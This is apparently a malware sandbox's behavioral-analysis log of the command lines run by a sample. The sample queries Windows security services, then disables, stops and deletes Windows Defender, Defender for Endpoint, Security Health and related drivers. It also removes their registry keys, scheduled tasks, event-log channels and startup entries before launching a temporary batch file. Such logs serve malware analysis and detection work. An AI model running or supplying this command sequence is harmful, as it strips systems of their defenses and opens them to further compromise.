Behavioral Analysis

chcp.com chcp 65001

reg.exe reg query "HKU\S-1-5-19"

reg.exe reg add "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "AppsUseLightTheme" /t reg_dword /d 0 /f

mode.com Mode 79,49

cmd.exe C:\Windows\system32\cmd.exe /c ver

reg.exe reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA"

find.exe find /i "0x0"

cmd.exe C:\Windows\system32\cmd.exe /c tasklist

reg.exe reg query "HKLM\System\CurrentControlSet\Services\WinDefend"

reg.exe reg query "HKLM\System\CurrentControlSet\Services\MDCoreSvc"

reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdNisSvc"

reg.exe reg query "HKLM\System\CurrentControlSet\Services\Sense"

reg.exe reg query "HKLM\System\CurrentControlSet\Services\wscsvc"

reg.exe reg query "HKLM\System\CurrentControlSet\Services\SgrmBroker"

reg.exe reg query "HKLM\System\CurrentControlSet\Services\SecurityHealthService"

reg.exe reg query "HKLM\System\CurrentControlSet\Services\webthreatdefsvc"

reg.exe reg query "HKLM\System\CurrentControlSet\Services\webthreatdefusersvc"

reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdNisDrv"

reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdBoot"

reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdFilter"

reg.exe reg query "HKLM\System\CurrentControlSet\Services\SgrmAgent"

reg.exe reg query "HKLM\System\CurrentControlSet\Services\MsSecWfp"

reg.exe reg query "HKLM\System\CurrentControlSet\Services\MsSecFlt"

reg.exe reg query "HKLM\System\CurrentControlSet\Services\MsSecCore"

reg.exe reg query HKLM\System\CurrentControlset\Services\WdFilter

reg.exe reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v "ProductName"

find.exe find /i "Windows 7"

cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ver "

findstr.exe findstr /c:"6.1.7601"

sc.exe sc config "WinDefend" start= disabled

sc.exe sc stop "WinDefend"

sc.exe sc delete "WinDefend"

reg.exe reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f

sc.exe sc config "MDCoreSvc" start= disabled

sc.exe sc stop "MDCoreSvc"

sc.exe sc delete "MDCoreSvc"

reg.exe reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f

sc.exe sc config "WdNisSvc" start= disabled

sc.exe sc stop "WdNisSvc"

sc.exe sc delete "WdNisSvc"

reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f

sc.exe sc config "Sense" start= disabled

sc.exe sc stop "Sense"

sc.exe sc delete "Sense"

reg.exe reg delete "HKLM\System\CurrentControlset\Services\Sense" /f

sc.exe sc config "wscsvc" start= disabled

sc.exe sc stop "wscsvc"

sc.exe sc delete "wscsvc"

reg.exe reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f

sc.exe sc config "SgrmBroker" start= disabled

sc.exe sc stop "SgrmBroker"

sc.exe sc delete "SgrmBroker"

reg.exe reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f

sc.exe sc config "SecurityHealthService" start= disabled

sc.exe sc stop "SecurityHealthService"

sc.exe sc delete "SecurityHealthService"

reg.exe reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f

sc.exe sc config "webthreatdefsvc" start= disabled

sc.exe sc stop "webthreatdefsvc"

sc.exe sc delete "webthreatdefsvc"

reg.exe reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f

sc.exe sc config "webthreatdefusersvc" start= disabled

sc.exe sc stop "webthreatdefusersvc"

sc.exe sc delete "webthreatdefusersvc"

reg.exe reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f

sc.exe sc config "WdNisDrv" start= disabled

sc.exe sc stop "WdNisDrv"

sc.exe sc delete "WdNisDrv"

reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f

sc.exe sc config "WdBoot" start= disabled

sc.exe sc stop "WdBoot"

sc.exe sc delete "WdBoot"

reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f

sc.exe sc config "WdFilter" start= disabled

sc.exe sc stop "WdFilter"

sc.exe sc delete "WdFilter"

reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f

sc.exe sc config "SgrmAgent" start= disabled

sc.exe sc stop "SgrmAgent"

sc.exe sc delete "SgrmAgent"

reg.exe reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f

sc.exe sc config "MsSecWfp" start= disabled

sc.exe sc stop "MsSecWfp"

sc.exe sc delete "MsSecWfp"

reg.exe reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f

sc.exe sc config "MsSecFlt" start= disabled

sc.exe sc stop "MsSecFlt"

sc.exe sc delete "MsSecFlt"

reg.exe reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f

sc.exe sc config "MsSecCore" start= disabled

sc.exe sc stop "MsSecCore"

sc.exe sc delete "MsSecCore"

reg.exe reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f

schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f

schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f

schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f

schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f

schtasks.exe schtasks /Delete /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /f

reg.exe reg delete "HKLM\Software\Microsoft\Windows Defender" /f

reg.exe reg delete "HKLM\Software\Microsoft\Windows Defender Security Center" /f

reg.exe reg delete "HKLM\Software\Microsoft\Windows Advanced Threat Protection" /f

reg.exe reg delete "HKLM\Software\Microsoft\Windows Security Health" /f

reg.exe reg delete "HKLM\System\CurrentControlset\Control\WMI\Autologger\DefenderApiLogger" /f

reg.exe reg delete "HKLM\System\CurrentControlset\Control\WMI\Autologger\DefenderAuditLogger" /f

reg.exe reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

reg.exe reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

reg.exe reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f

reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Windows Defender" /f

reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC" /f

reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\NIS-Driver-WFP/Diagnostic" /f

reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /f

reg.exe reg delete "HKLM\Software\Microsoft\SystemSettings\SettingId\SystemSettings_WindowsDefender_UseWindowsDefender" /f

reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}" /f

sc.exe sc start VMTools

sc.exe sc start VMTools

cmd.exe cmd /c C:\Users\test22\AppData\Local\Temp\34.bat